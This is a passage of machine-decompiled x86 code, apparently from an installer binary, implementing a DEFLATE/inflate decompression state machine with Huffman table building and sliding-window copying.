                                        						 *_t94 = __esi[2] & 0x00000000;
                                        						 *__esi = 0xc;
                                        						while(1) {
                                        							L60:
                                        							__esi[1] = __esi[1] >> 0xa;
                                        							__eax = (__esi[1] >> 0xa) + 4;
                                        							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                        								goto L68;
                                        							}
                                        							L61:
                                        							while(1) {
                                        								L64:
                                        								if(__ebx >= 3) {
                                        									break;
                                        								}
                                        								L62:
                                        								if( *(__ebp - 0x34) == 0) {
                                        									goto L182;
                                        								}
                                        								L63:
                                        								__eax =  *(__ebp - 0x38);
                                        								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                        								__ecx = __ebx;
                                        								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                        								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                        								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                        								__ebx = __ebx + 8;
                                        							}
                                        							L65:
                                        							__ecx = __esi[2];
                                        							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                        							__ebx = __ebx - 3;
                                        							_t108 = __ecx + 0x4073e8; // 0x121110
                                        							__ecx =  *_t108;
                                        							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                        							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                        							__ecx = __esi[1];
                                        							__esi[2] = __esi[2] + 1;
                                        							__eax = __esi[2];
                                        							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                        							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                        								goto L64;
                                        							}
                                        							L66:
                                        							while(1) {
                                        								L68:
                                        								if(__esi[2] >= 0x13) {
                                        									break;
                                        								}
                                        								L67:
                                        								_t119 = __esi[2] + 0x4073e8; // 0x4000300
                                        								__eax =  *_t119;
                                        								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                        								_t126 =  &(__esi[2]);
                                        								 *_t126 = __esi[2] + 1;
                                        							}
                                        							L69:
                                        							__ecx = __ebp - 8;
                                        							__edi =  &(__esi[0x143]);
                                        							 &(__esi[0x148]) =  &(__esi[0x144]);
                                        							__eax = 0;
                                        							 *(__ebp - 8) = 0;
                                        							__eax =  &(__esi[3]);
                                        							 *__edi = 7;
                                        							__eax = E00406B2B( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                        							if(__eax != 0) {
                                        								L72:
                                        								 *__esi = 0x11;
                                        								while(1) {
                                        									L180:
                                        									_t396 =  *_t446;
                                        									if(_t396 > 0xf) {
                                        										break;
                                        									}
                                        									L1:
                                        									switch( *((intOrPtr*)(_t396 * 4 +  &M00406A83))) {
                                        										case 0:
                                        											L101:
                                        											__eax = __esi[4] & 0x000000ff;
                                        											__esi[3] = __esi[4] & 0x000000ff;
                                        											__eax = __esi[5];
                                        											__esi[2] = __esi[5];
                                        											 *__esi = 1;
                                        											goto L102;
                                        										case 1:
                                        											L102:
                                        											__eax = __esi[3];
                                        											while(1) {
                                        												L105:
                                        												__eflags = __ebx - __eax;
                                        												if(__ebx >= __eax) {
                                        													break;
                                        												}
                                        												L103:
                                        												__eflags =  *(__ebp - 0x34);
                                        												if( *(__ebp - 0x34) == 0) {
                                        													goto L182;
                                        												}
                                        												L104:
                                        												__ecx =  *(__ebp - 0x38);
                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                        												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                        												__ecx = __ebx;
                                        												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                        												__ebx = __ebx + 8;
                                        												__eflags = __ebx;
                                        											}
                                        											L106:
                                        											__eax =  *(0x409408 + __eax * 2) & 0x0000ffff;
                                        											__eax = __eax &  *(__ebp - 0x40);
                                        											__ecx = __esi[2];
                                        											__eax = __esi[2] + __eax * 4;
                                        											__ecx =  *(__eax + 1) & 0x000000ff;
                                        											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                        											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                        											__ecx =  *__eax & 0x000000ff;
                                        											__eflags = __ecx;
                                        											if(__ecx != 0) {
                                        												L108:
                                        												__eflags = __cl & 0x00000010;
                                        												if((__cl & 0x00000010) == 0) {
                                        													L110:
                                        													__eflags = __cl & 0x00000040;
                                        													if((__cl & 0x00000040) == 0) {
                                        														goto L125;
                                        													}
                                        													L111:
                                        													__eflags = __cl & 0x00000020;
                                        													if((__cl & 0x00000020) == 0) {
                                        														goto L9;
                                        													}
                                        													L112:
                                        													 *__esi = 7;
                                        													goto L180;
                                        												}
                                        												L109:
                                        												__esi[2] = __ecx;
                                        												__esi[1] = __eax;
                                        												 *__esi = 2;
                                        												goto L180;
                                        											}
                                        											L107:
                                        											__esi[2] = __eax;
                                        											 *__esi = 6;
                                        											goto L180;
                                        										case 2:
                                        											L113:
                                        											__eax = __esi[2];
                                        											while(1) {
                                        												L116:
                                        												__eflags = __ebx - __eax;
                                        												if(__ebx >= __eax) {
                                        													break;
                                        												}
                                        												L114:
                                        												__eflags =  *(__ebp - 0x34);
                                        												if( *(__ebp - 0x34) == 0) {
                                        													goto L182;
                                        												}
                                        												L115:
                                        												__ecx =  *(__ebp - 0x38);
                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                        												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                        												__ecx = __ebx;
                                        												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                        												__ebx = __ebx + 8;
                                        												__eflags = __ebx;
                                        											}
                                        											L117:
                                        											 *(0x409408 + __eax * 2) & 0x0000ffff =  *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                        											__esi[1] = __esi[1] + ( *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                        											__ecx = __eax;
                                        											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                        											__ebx = __ebx - __eax;
                                        											__eflags = __ebx;
                                        											__eax = __esi[4] & 0x000000ff;
                                        											__esi[3] = __esi[4] & 0x000000ff;
                                        											__eax = __esi[6];
                                        											__esi[2] = __esi[6];
                                        											 *__esi = 3;
                                        											goto L118;
                                        										case 3:
                                        											L118:
                                        											__eax = __esi[3];
                                        											while(1) {
                                        												L121:
                                        												__eflags = __ebx - __eax;
                                        												if(__ebx >= __eax) {
                                        													break;
                                        												}
                                        												L119:
                                        												__eflags =  *(__ebp - 0x34);
                                        												if( *(__ebp - 0x34) == 0) {
                                        													goto L182;
                                        												}
                                        												L120:
                                        												__ecx =  *(__ebp - 0x38);
                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                        												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                        												__ecx = __ebx;
                                        												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                        												__ebx = __ebx + 8;
                                        												__eflags = __ebx;
                                        											}
                                        											L122:
                                        											__eax =  *(0x409408 + __eax * 2) & 0x0000ffff;
                                        											__eax = __eax &  *(__ebp - 0x40);
                                        											__ecx = __esi[2];
                                        											__eax = __esi[2] + __eax * 4;
                                        											__ecx =  *(__eax + 1) & 0x000000ff;
                                        											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                        											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                        											__ecx =  *__eax & 0x000000ff;
                                        											__eflags = __cl & 0x00000010;
                                        											if((__cl & 0x00000010) == 0) {
                                        												L124:
                                        												__eflags = __cl & 0x00000040;
                                        												if((__cl & 0x00000040) != 0) {
                                        													goto L9;
                                        												}
                                        												L125:
                                        												__esi[3] = __ecx;
                                        												__ecx =  *(__eax + 2) & 0x0000ffff;
                                        												__esi[2] = __eax;
                                        												goto L180;
                                        											}
                                        											L123:
                                        											__esi[2] = __ecx;
                                        											__esi[3] = __eax;
                                        											 *__esi = 4;
                                        											goto L180;
                                        										case 4:
                                        											L126:
                                        											__eax = __esi[2];
                                        											while(1) {
                                        												L129:
                                        												__eflags = __ebx - __eax;
                                        												if(__ebx >= __eax) {
                                        													break;
                                        												}
                                        												L127:
                                        												__eflags =  *(__ebp - 0x34);
                                        												if( *(__ebp - 0x34) == 0) {
                                        													goto L182;
                                        												}
                                        												L128:
                                        												__ecx =  *(__ebp - 0x38);
                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                        												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                        												__ecx = __ebx;
                                        												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                        												__ebx = __ebx + 8;
                                        												__eflags = __ebx;
                                        											}
                                        											L130:
                                        											 *(0x409408 + __eax * 2) & 0x0000ffff =  *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                        											__esi[3] = __esi[3] + ( *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                        											__ecx = __eax;
                                        											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                        											__ebx = __ebx - __eax;
                                        											__eflags = __ebx;
                                        											 *__esi = 5;
                                        											goto L131;
                                        										case 5:
                                        											L131:
                                        											__eax =  *(__ebp - 0x30);
                                        											__edx = __esi[3];
                                        											__eax = __eax - __esi;
                                        											__ecx = __eax - __esi - 0x1ba0;
                                        											__eflags = __eax - __esi - 0x1ba0 - __edx;
                                        											if(__eax - __esi - 0x1ba0 >= __edx) {
                                        												__ecx = __eax;
                                        												__ecx = __eax - __edx;
                                        												__eflags = __ecx;
                                        											} else {
                                        												__esi[0x26e8] = __esi[0x26e8] - __edx;
                                        												__ecx = __esi[0x26e8] - __edx - __esi;
                                        												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                                        											}
                                        											__eflags = __esi[1];
                                        											 *(__ebp - 0x20) = __ecx;
                                        											if(__esi[1] != 0) {
                                        												L135:
                                        												__edi =  *(__ebp - 0x2c);
                                        												do {
                                        													L136:
                                        													__eflags = __edi;
                                        													if(__edi != 0) {
                                        														goto L152;
                                        													}
                                        													L137:
                                        													__edi = __esi[0x26e8];
                                        													__eflags = __eax - __edi;
                                        													if(__eax != __edi) {
                                        														L143:
                                        														__esi[0x26ea] = __eax;
                                        														__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
                                        														__eax = __esi[0x26ea];
                                        														__ecx = __esi[0x26e9];
                                        														__eflags = __eax - __ecx;
                                        														 *(__ebp - 0x30) = __eax;
                                        														if(__eax >= __ecx) {
                                        															__edi = __esi[0x26e8];
                                        															__edi = __esi[0x26e8] - __eax;
                                        															__eflags = __edi;
                                        														} else {
                                        															__ecx = __ecx - __eax;
                                        															__edi = __ecx - __eax - 1;
                                        														}
                                        														__edx = __esi[0x26e8];
                                        														__eflags = __eax - __edx;
                                        														 *(__ebp - 8) = __edx;
                                        														if(__eax == __edx) {
                                        															__edx =  &(__esi[0x6e8]);
                                        															__eflags = __ecx - __edx;
                                        															if(__ecx != __edx) {
                                        																__eax = __edx;
                                        																__eflags = __eax - __ecx;
                                        																 *(__ebp - 0x30) = __eax;
                                        																if(__eax >= __ecx) {
                                        																	__edi =  *(__ebp - 8);
                                        																	__edi =  *(__ebp - 8) - __eax;
                                        																	__eflags = __edi;
                                        																} else {
                                        																	__ecx = __ecx - __eax;
                                        																	__edi = __ecx;
                                        																}
                                        															}
                                        														}
                                        														__eflags = __edi;
                                        														if(__edi == 0) {
                                        															goto L183;
                                        														} else {
                                        															goto L152;
                                        														}
                                        													}
                                        													L138:
                                        													__ecx = __esi[0x26e9];
                                        													__edx =  &(__esi[0x6e8]);
                                        													__eflags = __ecx - __edx;
                                        													if(__ecx == __edx) {
                                        														goto L143;
                                        													}
                                        													L139:
                                        													__eax = __edx;
                                        													__eflags = __eax - __ecx;
                                        													if(__eax >= __ecx) {
                                        														__edi = __edi - __eax;
                                        														__eflags = __edi;
                                        													} else {
                                        														__ecx = __ecx - __eax;
                                        														__edi = __ecx;
                                        													}
                                        													__eflags = __edi;
                                        													if(__edi == 0) {
                                        														goto L143;
                                        													}
                                        													L152:
                                        													__ecx =  *(__ebp - 0x20);
                                        													 *__eax =  *__ecx;
                                        													__eax = __eax + 1;
                                        													__ecx = __ecx + 1;
                                        													__edi = __edi - 1;
                                        													__eflags = __ecx - __esi[0x26e8];
                                        													 *(__ebp - 0x30) = __eax;
                                        													 *(__ebp - 0x20) = __ecx;
                                        													 *(__ebp - 0x2c) = __edi;
                                        													if(__ecx == __esi[0x26e8]) {
                                        														__ecx =  &(__esi[0x6e8]);
                                        														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                                        													}
                                        													_t357 =  &(__esi[1]);
                                        													 *_t357 = __esi[1] - 1;
                                        													__eflags =  *_t357;
                                        												} while ( *_t357 != 0);
                                        											}
                                        											goto L23;
                                        										case 6:
                                        											L156:
                                        											__eax =  *(__ebp - 0x2c);
                                        											__edi =  *(__ebp - 0x30);
                                        											__eflags = __eax;
                                        											if(__eax != 0) {
                                        												L172:
                                        												__cl = __esi[2];
                                        												 *__edi = __cl;
                                        												__edi = __edi + 1;
                                        												__eax = __eax - 1;
                                        												 *(__ebp - 0x30) = __edi;
                                        												 *(__ebp - 0x2c) = __eax;
                                        												goto L23;
                                        											}
                                        											L157:
                                        											__ecx = __esi[0x26e8];
                                        											__eflags = __edi - __ecx;
                                        											if(__edi != __ecx) {
                                        												L163:
                                        												__esi[0x26ea] = __edi;
                                        												__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
                                        												__edi = __esi[0x26ea];
                                        												__ecx = __esi[0x26e9];
                                        												__eflags = __edi - __ecx;
                                        												 *(__ebp - 0x30) = __edi;
                                        												if(__edi >= __ecx) {
                                        													__eax = __esi[0x26e8];
                                        													__eax = __esi[0x26e8] - __edi;
                                        													__eflags = __eax;
                                        												} else {
                                        													__ecx = __ecx - __edi;
                                        													__eax = __ecx - __edi - 1;
                                        												}
                                        												__edx = __esi[0x26e8];
                                        												__eflags = __edi - __edx;
                                        												 *(__ebp - 8) = __edx;
                                        												if(__edi == __edx) {
                                        													__edx =  &(__esi[0x6e8]);
                                        													__eflags = __ecx - __edx;
                                        													if(__ecx != __edx) {
                                        														__edi = __edx;
                                        														__eflags = __edi - __ecx;
                                        														 *(__ebp - 0x30) = __edi;
                                        														if(__edi >= __ecx) {
                                        															__eax =  *(__ebp - 8);
                                        															__eax =  *(__ebp - 8) - __edi;
                                        															__eflags = __eax;
                                        														} else {
                                        															__ecx = __ecx - __edi;
                                        															__eax = __ecx;
                                        														}
                                        													}
                                        												}
                                        												__eflags = __eax;
                                        												if(__eax == 0) {
                                        													goto L183;
                                        												} else {
                                        													goto L172;
                                        												}
                                        											}
                                        											L158:
                                        											__eax = __esi[0x26e9];
                                        											__edx =  &(__esi[0x6e8]);
                                        											__eflags = __eax - __edx;
                                        											if(__eax == __edx) {
                                        												goto L163;
                                        											}
                                        											L159:
                                        											__edi = __edx;
                                        											__eflags = __edi - __eax;
                                        											if(__edi >= __eax) {
                                        												__ecx = __ecx - __edi;
                                        												__eflags = __ecx;
                                        												__eax = __ecx;
                                        											} else {
                                        												__eax = __eax - __edi;
                                        												__eax = __eax - 1;
                                        											}
                                        											__eflags = __eax;
                                        											if(__eax != 0) {
                                        												goto L172;
                                        											} else {
                                        												goto L163;
                                        											}
                                        										case 7:
                                        											L173:
                                        											__eflags = __ebx - 7;
                                        											if(__ebx > 7) {
                                        												__ebx = __ebx - 8;
                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                                        												_t380 = __ebp - 0x38;
                                        												 *_t380 =  *(__ebp - 0x38) - 1;
                                        												__eflags =  *_t380;
                                        											}
                                        											goto L175;
                                        										case 8:
                                        											L4:
                                        											while(_t425 < 3) {
                                        												if( *(_t448 - 0x34) == 0) {
                                        													goto L182;
                                        												} else {
                                        													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                                        													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                                        													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                                        													_t425 = _t425 + 8;
                                        													continue;
                                        												}
                                        											}
                                        											_t425 = _t425 - 3;
                                        											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                                        											_t406 =  *(_t448 - 0x40) & 0x00000007;
                                        											asm("sbb ecx, ecx");
                                        											_t408 = _t406 >> 1;
                                        											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                                        											if(_t408 == 0) {
                                        												L24:
                                        												 *_t446 = 9;
                                        												_t436 = _t425 & 0x00000007;
                                        												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                                        												_t425 = _t425 - _t436;
                                        												goto L180;
                                        											}
                                        											L6:
                                        											_t411 = _t408 - 1;
                                        											if(_t411 == 0) {
                                        												L13:
                                        												__eflags =  *0x42dbb8;
                                        												if( *0x42dbb8 != 0) {
                                        													L22:
                                        													_t412 =  *0x40942c; // 0x9
                                        													_t446[4] = _t412;
                                        													_t413 =  *0x409430; // 0x5
                                        													_t446[4] = _t413;
                                        													_t414 =  *0x42ca34; // 0x0
                                        													_t446[5] = _t414;
                                        													_t415 =  *0x42ca30; // 0x0
                                        													_t446[6] = _t415;
                                        													L23:
                                        													 *_t446 =  *_t446 & 0x00000000;
                                        													goto L180;
                                        												} else {
                                        													_t26 = _t448 - 8;
                                        													 *_t26 =  *(_t448 - 8) & 0x00000000;
                                        													__eflags =  *_t26;
                                        													_t416 = 0x42ca38;
                                        													goto L15;
                                        													L20:
                                        													 *_t416 = _t438;
                                        													_t416 = _t416 + 4;
                                        													__eflags = _t416 - 0x42ceb8;
                                        													if(_t416 < 0x42ceb8) {
                                        														L15:
                                        														__eflags = _t416 - 0x42cc74;
                                        														_t438 = 8;
                                        														if(_t416 > 0x42cc74) {
                                        															__eflags = _t416 - 0x42ce38;
                                        															if(_t416 >= 0x42ce38) {
                                        																__eflags = _t416 - 0x42ce98;
                                        																if(_t416 < 0x42ce98) {
                                        																	_t438 = 7;
                                        																}
                                        															} else {
                                        																_t438 = 9;
                                        															}
                                        														}
                                        														goto L20;
                                        													} else {
                                        														E00406B2B(0x42ca38, 0x120, 0x101, 0x4073fc, 0x40743c, 0x42ca34, 0x40942c, 0x42d338, _t448 - 8);
                                        														_push(0x1e);
                                        														_pop(_t440);
                                        														_push(5);
                                        														_pop(_t419);
                                        														memset(0x42ca38, _t419, _t440 << 2);
                                        														_t450 = _t450 + 0xc;
                                        														_t442 = 0x42ca38 + _t440;
                                        														E00406B2B(0x42ca38, 0x1e, 0, 0x40747c, 0x4074b8, 0x42ca30, 0x409430, 0x42d338, _t448 - 8);
                                        														 *0x42dbb8 =  *0x42dbb8 + 1;
                                        														__eflags =  *0x42dbb8;
                                        														goto L22;
                                        													}
                                        												}
                                        											}
                                        											L7:
                                        											_t423 = _t411 - 1;
                                        											if(_t423 == 0) {
                                        												 *_t446 = 0xb;
                                        												goto L180;
                                        											}
                                        											L8:
                                        											if(_t423 != 1) {
                                        												goto L180;
                                        											}
                                        											goto L9;
                                        										case 9:
                                        											while(1) {
                                        												L27:
                                        												__eflags = __ebx - 0x10;
                                        												if(__ebx >= 0x10) {
                                        													break;
                                        												}
                                        												L25:
                                        												__eflags =  *(__ebp - 0x34);
                                        												if( *(__ebp - 0x34) == 0) {
                                        													goto L182;
                                        												}
                                        												L26:
                                        												__eax =  *(__ebp - 0x38);
                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                        												__ecx = __ebx;
                                        												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                        												__ebx = __ebx + 8;
                                        												__eflags = __ebx;
                                        											}
                                        											L28:
                                        											__eax =  *(__ebp - 0x40);
                                        											__ebx = 0;
                                        											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                                        											 *(__ebp - 0x40) = 0;
                                        											__eflags = __eax;
                                        											__esi[1] = __eax;
                                        											if(__eax == 0) {
                                        												goto L53;
                                        											}
                                        											L29:
                                        											_push(0xa);
                                        											_pop(__eax);
                                        											goto L54;
                                        										case 0xa:
                                        											L30:
                                        											__eflags =  *(__ebp - 0x34);
                                        											if( *(__ebp - 0x34) == 0) {
                                        												goto L182;
                                        											}
                                        											L31:
                                        											__eax =  *(__ebp - 0x2c);
                                        											__eflags = __eax;
                                        											if(__eax != 0) {
                                        												L48:
                                        												__eflags = __eax -  *(__ebp - 0x34);
                                        												if(__eax >=  *(__ebp - 0x34)) {
                                        													__eax =  *(__ebp - 0x34);
                                        												}
                                        												__ecx = __esi[1];
                                        												__eflags = __ecx - __eax;
                                        												__edi = __ecx;
                                        												if(__ecx >= __eax) {
                                        													__edi = __eax;
                                        												}
                                        												__eax = E0040585F( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                                        												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                                        												_t80 =  &(__esi[1]);
                                        												 *_t80 = __esi[1] - __edi;
                                        												__eflags =  *_t80;
                                        												if( *_t80 == 0) {
                                        													L53:
                                        													__eax = __esi[0x145];
                                        													L54:
                                        													 *__esi = __eax;
                                        												}
                                        												goto L180;
                                        											}
                                        											L32:
                                        											__ecx = __esi[0x26e8];
                                        											__edx =  *(__ebp - 0x30);
                                        											__eflags = __edx - __ecx;
                                        											if(__edx != __ecx) {
                                        												L38:
                                        												__esi[0x26ea] = __edx;
                                        												__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
                                        												__edx = __esi[0x26ea];
                                        												__ecx = __esi[0x26e9];
                                        												__eflags = __edx - __ecx;
                                        												 *(__ebp - 0x30) = __edx;
                                        												if(__edx >= __ecx) {
                                        													__eax = __esi[0x26e8];
                                        													__eax = __esi[0x26e8] - __edx;
                                        													__eflags = __eax;
                                        												} else {
                                        													__ecx = __ecx - __edx;
                                        													__eax = __ecx - __edx - 1;
                                        												}
                                        												__edi = __esi[0x26e8];
                                        												 *(__ebp - 0x2c) = __eax;
                                        												__eflags = __edx - __edi;
                                        												if(__edx == __edi) {
                                        													__edx =  &(__esi[0x6e8]);
                                        													__eflags = __edx - __ecx;
                                        													if(__eflags != 0) {
                                        														 *(__ebp - 0x30) = __edx;
                                        														if(__eflags >= 0) {
                                        															__edi = __edi - __edx;
                                        															__eflags = __edi;
                                        															__eax = __edi;
                                        														} else {
                                        															__ecx = __ecx - __edx;
                                        															__eax = __ecx;
                                        														}
                                        														 *(__ebp - 0x2c) = __eax;
                                        													}
                                        												}
                                        												__eflags = __eax;
                                        												if(__eax == 0) {
                                        													goto L183;
                                        												} else {
                                        													goto L48;
                                        												}
                                        											}
                                        											L33:
                                        											__eax = __esi[0x26e9];
                                        											__edi =  &(__esi[0x6e8]);
                                        											__eflags = __eax - __edi;
                                        											if(__eax == __edi) {
                                        												goto L38;
                                        											}
                                        											L34:
                                        											__edx = __edi;
                                        											__eflags = __edx - __eax;
                                        											 *(__ebp - 0x30) = __edx;
                                        											if(__edx >= __eax) {
                                        												__ecx = __ecx - __edx;
                                        												__eflags = __ecx;
                                        												__eax = __ecx;
                                        											} else {
                                        												__eax = __eax - __edx;
                                        												__eax = __eax - 1;
                                        											}
                                        											__eflags = __eax;
                                        											 *(__ebp - 0x2c) = __eax;
                                        											if(__eax != 0) {
                                        												goto L48;
                                        											} else {
                                        												goto L38;
                                        											}
                                        										case 0xb:
                                        											goto L56;
                                        										case 0xc:
                                        											L60:
                                        											__esi[1] = __esi[1] >> 0xa;
                                        											__eax = (__esi[1] >> 0xa) + 4;
                                        											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                        												goto L68;
                                        											}
                                        											goto L61;
                                        										case 0xd:
                                        											while(1) {
                                        												L93:
                                        												__eax = __esi[1];
                                        												__ecx = __esi[2];
                                        												__edx = __eax;
                                        												__eax = __eax & 0x0000001f;
                                        												__edx = __edx >> 5;
                                        												__eax = __edx + __eax + 0x102;
                                        												__eflags = __esi[2] - __eax;
                                        												if(__esi[2] >= __eax) {
                                        													break;
                                        												}
                                        												L73:
                                        												__eax = __esi[0x143];
                                        												while(1) {
                                        													L76:
                                        													__eflags = __ebx - __eax;
                                        													if(__ebx >= __eax) {
                                        														break;
                                        													}
                                        													L74:
                                        													__eflags =  *(__ebp - 0x34);
                                        													if( *(__ebp - 0x34) == 0) {
                                        														goto L182;
                                        													}
                                        													L75:
                                        													__ecx =  *(__ebp - 0x38);
                                        													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                        													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                        													__ecx = __ebx;
                                        													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                        													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                        													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                        													__ebx = __ebx + 8;
                                        													__eflags = __ebx;
                                        												}
                                        												L77:
                                        												__eax =  *(0x409408 + __eax * 2) & 0x0000ffff;
                                        												__eax = __eax &  *(__ebp - 0x40);
                                        												__ecx = __esi[0x144];
                                        												__eax = __esi[0x144] + __eax * 4;
                                        												__edx =  *(__eax + 1) & 0x000000ff;
                                        												__eax =  *(__eax + 2) & 0x0000ffff;
                                        												__eflags = __eax - 0x10;
                                        												 *(__ebp - 0x14) = __eax;
                                        												if(__eax >= 0x10) {
                                        													L79:
                                        													__eflags = __eax - 0x12;
                                        													if(__eax != 0x12) {
                                        														__eax = __eax + 0xfffffff2;
                                        														 *(__ebp - 8) = 3;
                                        													} else {
                                        														_push(7);
                                        														 *(__ebp - 8) = 0xb;
                                        														_pop(__eax);
                                        													}
                                        													while(1) {
                                        														L84:
                                        														__ecx = __eax + __edx;
                                        														__eflags = __ebx - __eax + __edx;
                                        														if(__ebx >= __eax + __edx) {
                                        															break;
                                        														}
                                        														L82:
                                        														__eflags =  *(__ebp - 0x34);
                                        														if( *(__ebp - 0x34) == 0) {
                                        															goto L182;
                                        														}
                                        														L83:
                                        														__ecx =  *(__ebp - 0x38);
                                        														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                        														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                        														__ecx = __ebx;
                                        														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                        														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                        														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                        														__ebx = __ebx + 8;
                                        														__eflags = __ebx;
                                        													}
                                        													L85:
                                        													__ecx = __edx;
                                        													__ebx = __ebx - __edx;
                                        													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                        													 *(0x409408 + __eax * 2) & 0x0000ffff =  *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                        													__edx =  *(__ebp - 8);
                                        													__ebx = __ebx - __eax;
                                        													__edx =  *(__ebp - 8) + ( *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                        													__ecx = __eax;
                                        													__eax = __esi[1];
                                        													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                        													__ecx = __esi[2];
                                        													__eax = __eax >> 5;
                                        													__edi = __eax >> 0x00000005 & 0x0000001f;
                                        													__eax = __eax & 0x0000001f;
                                        													__eax = __edi + __eax + 0x102;
                                        													__edi = __edx + __ecx;
                                        													__eflags = __edx + __ecx - __eax;
                                        													if(__edx + __ecx > __eax) {
                                        														goto L9;
                                        													}
                                        													L86:
                                        													__eflags =  *(__ebp - 0x14) - 0x10;
                                        													if( *(__ebp - 0x14) != 0x10) {
                                        														L89:
                                        														__edi = 0;
                                        														__eflags = 0;
                                        														L90:
                                        														__eax = __esi + 0xc + __ecx * 4;
                                        														do {
                                        															L91:
                                        															 *__eax = __edi;
                                        															__ecx = __ecx + 1;
                                        															__eax = __eax + 4;
                                        															__edx = __edx - 1;
                                        															__eflags = __edx;
                                        														} while (__edx != 0);
                                        														__esi[2] = __ecx;
                                        														continue;
                                        													}
                                        													L87:
